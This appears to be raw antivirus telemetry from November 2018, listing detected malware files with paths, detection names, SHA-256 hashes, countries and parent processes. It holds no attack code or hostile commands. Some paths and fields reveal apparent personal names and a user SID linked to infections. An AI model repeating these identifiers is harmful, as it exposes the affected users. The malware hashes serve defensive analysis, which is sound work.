  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='36890a1b21a981d187c4ae077f0138ab97bff66a53c2587191aba6bf9c3b23e3', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T11:00:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered codel', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered codel', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='687dba07f7e20457df2c5640ea4017d06bae98bb510dab3a22a274c65f8216e6', metadata=Row(cmdline='{1F461298-2C89-4139-B4CA-2636AAD6D8BC} S-1-5-21-1493592704-1720522295-1232219238-1001:Laura\\\\\\\\Ardilla:Interactive:Highest[1]', country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\taskeng.exe', parentsize=359936, timestamp='2018-11-01T18:40:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ioc553ffa9b-0187-f249-bb62-27864065fdcb.exe', filepath='C:\\programdata\\kaspersky lab\\avp18.0.0\\temp\\ioc553FFA9B-0187-F249-BB62-27864065FDCB.exe', filesize=16416000, name='TR/Patched.Ren.Gen.#M300.#R4405'), hash='153672a8a39883d8fb5baf76454c9145ca648f8b6f3b8d32afe39dd96807095d', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T13:09:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T16:02:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0006418.exe', filepath='E:\\System Volume Information\\_restore{69212C0F-784E-4A08-A5CD-0319A60006C2}\\RP5\\A0006418.exe', filesize=384000, name='W64/Infector.Gen8.#M300.#R700674'), hash='26d6e301c16ee99aef483d90f6060a61f156d460737a35aeee3791c60cfffe2c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:11:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-131808-6c2f9913', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b18897e6\\AVSCAN-20181101-131504-56DDCCF3\\AVSCAN-20181101-131808-6C2F9913', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:18:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T04:54:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-225841-d7fab53b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3519976a\\AVSCAN-20181101-225813-D27FBC52\\AVSCAN-20181101-225841-D7FAB53B', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='19ef9a33cd64e73a74511bff6d5ed9f6e71ef1d12b2a90b0e2380a0b59e5df3f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:58:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='9', filepath='9', filesize=64000, name='TR/Crypt.ZPACK.Gen.#M2.#R2284'), hash='565e2c57d63d5fa0ea0d21abe16ed0fceef3dddd29e1ad16f0ddfe67c3721d33', metadata=Row(cmdline=None, country='CN', os_name='MacOS', os_vmajor='18', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T05:40:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wwff.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\istE54F.tmp\\tools\\wwff.exe', filesize=624000, name='HEUR/AGEN.1011425.#M1.#R1'), hash='2cd623a10896ee766e9ff87a28b56b321d54742939917e1527270122069e1889', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\EnigmaSoft\\SpyHunter\\ShKernel.exe', parentsize=9872688, timestamp='2018-11-01T21:47:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-014233-b1536a78', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9a6eba25\\AVSCAN-20181102-014133-AD7C0283\\AVSCAN-20181102-014233-B1536A78', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:42:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T12:33:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-210140-f72563b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77273961\\AVSCAN-20181101-210123-F4CCC88E\\AVSCAN-20181101-210140-F72563B3', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:01:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-090315-dba1e54e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_94de3d9d\\AVSCAN-20181101-090048-D2447FF7\\AVSCAN-20181101-090315-DBA1E54E', filesize=1920000, name='TR/Hesv.rfwaf.#M1.#R1'), hash='39f6946c1a066b1cbde5f405ec3c9b9221fdd5c30ca0fb763d6876c803c1f71c', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:03:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa6808.15790\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa6808.15790\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T20:04:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='docx2rtf.exe', filepath='j:\\office\\office 2003\\docx2rf\\Docx2Rtf.exe', filesize=3392000, name='W32/Sality.AT.#M1.#R1'), hash='4ba1d4de4fb826f24aa75c13925c47fa4f10ae65bcc7f3773e038ca31bebeae7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:30:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-033231-4c79968e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181031-004656-B5FD04F1\\AVSCAN-20181101-033231-4C79968E', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='91fba6fca031908e6969df03690860fda06ca2a0adc2f441703481a80d6e0185', metadata=Row(cmdline=None, country='ET', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:32:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp0000c6b1', filepath='C:\\Windows\\Temp\\b75cc136-7be7-4861-a0a2-9edfdaaf085f\\tmp0000056b\\tmp0000c6b1', filesize=17088000, name='TR/Crypt.XPACK.Gen.#M300.#R2389'), hash='87935d1eed5d0d8015f92a7efeae8d7210a11e2d63295fa649acd618aaf7db89', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-01T12:02:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=0, name='TR/Patched.Ren.Gen.#M2.#R3780'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:03:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='de4aca49c68fad604d447cee5fb9f451e831c2dd1aa340d8f3229526c641065d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\DE4ACA49C68FAD604D447CEE5FB9F451E831C2DD1AA340D8F3229526C641065D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='de4aca49c68fad604d447cee5fb9f451e831c2dd1aa340d8f3229526c641065d', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:12:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pcr1                                   .scr', filepath='E:\\Proyecto\\PCR1                                   .scr', filesize=64000, name='W32/Sality.K.#M1.#R1'), hash='e562a79153316650e911a59240cf1949e94b5b45d5e72143edefd294716ab455', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:12:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095504-78bcd885', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095504-78BCD885', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:55:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='moduli.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\INFORMATICA\\MODULI.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:23:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\a3b3uk2xzdp\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:27:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='installs.exe', filepath='C:\\Program Files\\SolidWorks Corp\\SolidWorks Flow Simulation\\License\\Flexlm\\installs.exe', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='b04d8e411d34db8073db8bc4e5fd6dcb27af7cef2c1c06a8369da191f9178ae3', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:LR+zorPAlEGtGn9J.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T01:41:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwtrig20.exe', filepath='C:\\MSOCache\\All Users\\{90120000-0115-0409-0000-0000000FF1CE}-C\\dwtrig20.exe', filesize=476000, name='W32/Neshta.A.#M1.#R1'), hash='9cba9ef1e8dd4bb883f628fc9a51cbdbedc4ce2eb00ca42212ccce321e7d7f9e', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mobile Partner\\UpdateDog\\ouc.exe', parentsize=697184, timestamp='2018-11-01T16:57:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='98a564c51ad69f757410e9afdcdb1eed2a49e2964751168901d24e891267f0bf', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:13:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-191126-db2b7500', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_16bdc093\\AVSCAN-20181031-190600-B1974AD3\\AVSCAN-20181031-191126-DB2B7500', filesize=64000, name='Worm/Agent.64000.22.#M1.#R1'), hash='cc89a74b08d086e9ad57161bfee1f7f0c56802f3c6646bc3863ad41095fdaecc', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T02:11:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pmbservicemailsender.exe', filepath='\\\\?\\E:\\Program Files (x86)\\Sony\\PMB\\PMBServiceMailSender.exe', filesize=256000, name='W32/Neshta.A.#M1.#R1'), hash='a2ee6cec323e6222acd777528779cff0251cf7101afcc967ec7ab8c709bb810e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T03:52:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\WinSxS\\x86_microsoft-windows-d..b-standardcollector_31bf3856ad364e35_10.0.15063.0_none_e6376d51f3e7328e\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='f30f45f64f9915a54a72936aa73d011b180246953a9e06118d22da07808df075', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T00:51:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-213420-499ce400', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-213420-499CE400', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:34:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-183153-468e6659', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-183054-3DAB933E\\AVSCAN-20181101-183153-468E6659', filesize=64000, name='VBA/Dldr.Agent.futat.#M1.#R1'), hash='8e0a02d2cf2f68a446cf6360b746631e4cc17e7db282d55b47e6a5fa279f734d', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:31:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-172807-de41c854', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_357a596a\\AVSCAN-20181101-172500-D01F2DF7\\AVSCAN-20181101-172807-DE41C854', filesize=64000, name='HEUR/Macro.Downloader.AMCY.Gen.#M1.#R1'), hash='eb675aa48f70eecf55150f853d736e19810d37734f58b8df62063f0ec2178729', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:28:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='borang ukk kesehatan 2015.exe', filepath='F:\\\xa0\\borang UKK kesehatan 2015\\borang UKK kesehatan 2015.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T02:30:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155124-035880a4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0861ec4d\\AVSCAN-20181101-155028-FBD86BEB\\AVSCAN-20181101-155124-035880A4', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:51:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154619-cf983fe0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_52a04c1c\\AVSCAN-20181101-154555-CB8F528F\\AVSCAN-20181101-154619-CF983FE0', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T07:46:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-190549-f80dc609', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190124-CAF68D09\\AVSCAN-20181101-190549-F80DC609', filesize=64000, name='BDS/Rogue.766002.#M1.#R1'), hash='c52dabe8d138d077358065c61a91b37e1ec4311e69e5b26e8f950f5d25c0c474', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:05:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151345-2a7c4c2c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-151345-2A7C4C2C', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:13:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gta_san_andreas_game.exe', filepath='C:\\Users\\X\\Downloads\\GTA_San_Andreas_Game.exe', filesize=4224000, name='W32/Sality.AT.#M1.#R1'), hash='3118892fd4c26e6dfbeeb88e1ba4ed5869d4cc6169130fa0a6f98f6fb98c9f02', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-04T05:33:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131516-2973c6ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-131516-2973C6AC', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:15:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181103-194410-b9d917d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_be749abb\\AVSCAN-20181103-194209-A34D8E13\\AVSCAN-20181103-194410-B9D917D2', filesize=1536000, name='TR/CoinMiner.BZ.#M1.#R1'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline=None, country='SV', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T01:44:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='isnpbu.exe', filepath='\\\\?\\E:\\PASTOR ELOY GARCIA C\\AppData\\Local\\isnpbu.exe', filesize=2560000, name='ADWARE/Lollipop.Gen4.#M300.#R300075'), hash='01766c45d95807f53617e7b39a692d510e4dbdd220ca7aed44bd852ed782ace5', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:15:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='3d289b27444c5e7307cdf5318a8b5414edaa4eb9', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\3d289b27444c5e7307cdf5318a8b5414edaa4eb9', filesize=2304000, name='HEUR/AGEN.1033829.#M1.#R1'), hash='6cfc7671e5b12a69986d0f2129cd27420143e62c67b8ca4c8cdcd5f65ffc8ca6', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:23:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:31:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-04T00:52:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='BA', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1589080, timestamp='2018-11-04T16:02:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130612-0064f1fa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-130612-0064F1FA', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:06:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='play-matrix.exe', filepath='i:\\files\\منوعات\\كونكر افريقيا\\Play-Matrix.exe', filesize=512000, name='TR/Rogue.dkoca.#M1.#R1'), hash='45419fbb7330979f9cdbcc8b752017dd682f42ecc7d6baf98c3cee7cb1c30012', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:40:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00018f6e', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp00018f6e', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:08:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-04T00:59:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-135126-301a3e0a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5b2055eb\\AVSCAN-20181104-134144-E9320359\\AVSCAN-20181104-135126-301A3E0A', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:51:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-162429-fb8a5274', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b975dbb4\\AVSCAN-20181104-160932-A304E1F8\\AVSCAN-20181104-162429-FB8A5274', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T21:24:27Z'), dt=datetime.date(2018, 11, 4)),
